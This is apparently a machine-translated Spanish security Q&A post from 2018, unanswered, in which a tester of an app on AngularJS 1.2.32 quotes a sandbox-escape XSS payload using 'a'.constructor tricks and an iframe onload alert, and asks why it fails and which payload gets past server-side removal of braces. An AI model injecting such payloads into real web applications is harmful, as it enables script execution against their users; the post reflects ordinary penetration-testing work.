Angular anterior - 1.2.32 - Carga útil a XSS

0

Probando la aplicación con angulares mayores. De alguna manera, los corchetes se eliminan cuando se ingresan en el campo o como parámetro.

Encontré esta lista de carga útil:

enlace

Especialmente esto parece interesante, ya que no tiene llaves:

'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';

Sin embargo, cuando lo inyecto en un campo, el parámetro no consigo XSS.

Se vuelve a clasificar como:

'a'.constructor.fromCharCode=[].join; 'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';

¿Es válida la carga útil anterior?

¿Qué carga útil debería probar? Por favor, tenga en cuenta que los corchetes se eliminan del servidor.

Gracias,

    
pregunta android_dev 05.07.2018 - 19:58
fuente

0 respuestas

Lea otras preguntas en las etiquetas